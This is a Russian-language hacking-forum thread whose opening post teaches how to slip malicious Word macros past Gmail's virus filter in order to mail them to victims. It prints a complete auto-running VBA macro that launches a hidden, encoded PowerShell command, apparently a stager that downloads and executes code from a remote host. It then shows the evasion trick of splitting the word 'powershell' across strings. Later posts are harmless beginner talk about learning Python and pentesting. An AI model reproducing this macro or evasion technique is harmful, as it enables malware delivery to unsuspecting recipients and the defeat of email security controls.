Обход проверки вредоносных макросов сервисами gmail

~~^Shad0w __ Just1ce^~~

~^_Wired FaLc❍n_^~
ELEET
19.10.2016
699
2 349
DarkSide
www.youtube.com
#1
Привет колеги. Вы уж извините , но это статья будет короткая но со смыслом)))
Как большинство из вас знает,почта gmail всячески не дает нам отсылать вредоносные макросы нашим так сказать клиентам)
И вот некоторыми хорошими людьми было замечено что службы gmail парсят в макросах документа определенные слова,в случае обнаружение таких будет уведомления о том что в документе обнаружен вирус , и в лучшем случае письмо просто попадет в спам,а обычно даже отослать не дают.
1.PNG
Обходится это очень и очень просто)

Если у нас код макроса следующего вида:

Код:
Sub AutoOpen()
    Debugging
End Sub

Sub Document_Open()
    Debugging
End Sub

Public Function Debugging() As Variant
    Dim Str As String
    str = "powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBT"
    str = str + "AHkAcwB0AGUAbQAuAE4ARQBUAC4AUwBlAHIAVgBJAEMARQBQAG"
    str = str + "8ASQBOAHQATQBhAE4AQQBnAEUAUgBdADoAOgBFAFgAcABFAEMA"
    str = str + "VAAxADAAMABDAG8ATgB0AGkAbgBVAEUAIAA9ACAAMAA7ACQAVw"
    str = str + "BjAD0ATgBlAFcALQBPAEIAagBlAEMAVAAgAFMAeQBzAFQARQBt"
    str = str + "AC4ATgBlAFQALgBXAGUAYgBDAEwASQBFAE4AVAA7ACQAdQA9AC"
    str = str + "cATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8A"
    str = str + "dwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVA"
    str = str + "ByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAw"
    str = str + "ACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAQwAuAE"
    str = str + "gAZQBhAEQARQBSAFMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEA"
    str = str + "ZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAYwAuAFAAUgBPAHgAWQ"
    str = str + "AgAD0AIABbAFMAeQBTAFQARQBNAC4ATgBFAFQALgBXAEUAYgBS"
    str = str + "AEUAcQB1AGUAcwBUAF0AOgA6AEQAZQBGAGEAVQBsAHQAVwBFAG"
    str = str + "IAUABSAG8AeAB5ADsAJABXAGMALgBQAFIAbwBYAHkALgBDAFIA"
    str = str + "ZQBkAGUATgB0AEkAQQBMAHMAIAA9ACAAWwBTAHkAUwBUAEUAbQ"
    str = str + "AuAE4ARQBUAC4AQwBSAGUAZABlAE4AdABJAGEAbABDAEEAQwBI"
    str = str + "AEUAXQA6ADoARABFAEYAYQBVAEwAdABOAGUAdAB3AE8AUgBLAE"
    str = str + "MAUgBlAGQAZQBuAHQASQBBAEwAUwA7ACQASwA9ACcAeQAzAGAA"
    str = str + "QQAuAGQAZgBsAFMAYgBNAFcAKwB6AEcAdwBWADkAQgBeADAAPQ"
    str = str + "BcADQAYwAkAHIAWwBnACUAUQBOACcAOwAkAGkAPQAwADsAWwBj"
    str = str + "AGgAYQByAFsAXQBdACQAQgA9ACgAWwBjAEgAQQBSAFsAXQBdAC"
    str = str + "gAJAB3AGMALgBEAG8AVwBOAEwATwBBAGQAUwBUAHIASQBuAGcA"
    str = str + "KAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMw"
    str = str + "A3AC4AMQAzADcAOgA4ADAAOAAwAC8AaQBuAGQAZQB4AC4AYQBz"
    str = str + "AHAAIgApACkAKQB8ACUAewAkAF8ALQBCAFgAbwByACQASwBbAC"
    str = str + "QAaQArACsAJQAkAGsALgBMAGUAbgBnAHQASABdAH0AOwBJAEUA"
    str = str + "WAAgACgAJABiAC0ASgBPAEkAbgAnACcAKQA="
    Const HIDDEN_WINDOW = 0
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objProcess.Create str, Null, objConfig, intProcessID
End Function
2.PNG

То для обхождения фильтра нам нужно просто :
Разбить запрос что бы фильтры не смогли скушать целое слово powershell
И изменить первых две строки
Код:
str = "powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBT"
    str = str + "AHkAcwB0AGUAbQAuAE4ARQBUAC4AUwBlAHIAVgBJAEMARQBQAG"
На
Код:
str = "powersh"
str = str + "ell.exe -NoP -sta -NonI -W Hidden -Enc WwBT"
    str = str + "AHkAcwB0AGUAbQAuAE4ARQBUAC4AUwBlAHIAVgBJAEMARQBQAG"
B все) Профит)
3.PNG



Cпасибо за внимание)
 
18.04.2017
11
4
28
#4
Получилось? Опишите более детально как помог данный пост опробовать описанное.

Привет друг! я В этом деле начинающий! Я еще не пробовал данный метотод но попробую. для начало хочу обратно кали поставить на ноут но проблема с гибридной видео картой. страдаю на виндовсе...... не люблю я его на линуксе проще намного мне работать. щас вот решился учиться программрованию но незнаю с какого языка мне проще будет. чтоб скажем так он был мне полезен. для тех же писания экслойтов. Так же чтоб можно было читать и понимать исходный код. желание и терпение есть а вот с какой тропы начать и куда идти да так что не ошибиться ......... запутался я мне бы в помощь опытного человека. А направление мое меня больше интересует пен тестинг. linux и все что с ним связано. Планы грандиозные )))) Соображалка работает. Но вот нужно в правельное русло как то все связать. .......:)
 

DSW

Well-Known Member
20.03.2017
71
21
#5
Привет друг! я В этом деле начинающий! Я еще не пробовал данный метотод но попробую. для начало хочу обратно кали поставить на ноут но проблема с гибридной видео картой. страдаю на виндовсе...... не люблю я его на линуксе проще намного мне работать. щас вот решился учиться программрованию но незнаю с какого языка мне проще будет. чтоб скажем так он был мне полезен. для тех же писания экслойтов. Так же чтоб можно было читать и понимать исходный код. желание и терпение есть а вот с какой тропы начать и куда идти да так что не ошибиться ......... запутался я мне бы в помощь опытного человека. А направление мое меня больше интересует пен тестинг. linux и все что с ним связано. Планы грандиозные )))) Соображалка работает. Но вот нужно в правельное русло как то все связать. .......:)
Для того чтоб писайть эксплойты сойдет и обычный блокнот,а во язык программирования можно взять python.Пентест вообще не зависти от какой либо ОС,что нравиться то и используй.Пентест вообще штука забавная, в нем нужно знать все,и учиться надо все время,так как каждый день появляются новые виды угроз.Самое главное больше читать и искать новые решения самому,ну и посещать или смотреть разного рода конфиренции.
 
18.04.2017
11
4
28
#6
Для того чтоб писайть эксплойты сойдет и обычный блокнот,а во язык программирования можно взять python.Пентест вообще не зависти от какой либо ОС,что нравиться то и используй.Пентест вообще штука забавная, в нем нужно знать все,и учиться надо все время,так как каждый день появляются новые виды угроз.Самое главное больше читать и искать новые решения самому,ну и посещать или смотреть разного рода конфиренции.
Как начинающему программисту лучше с питона начачть? я думал лучше с Си
 

DSW

Well-Known Member
20.03.2017
71
21
#7
Как начинающему программисту лучше с питона начачть? я думал лучше с Си
Тут мы как бы от темы уходим....
С/С++ для начало это слишком,а вот python самое оно,после можно и на си переходить.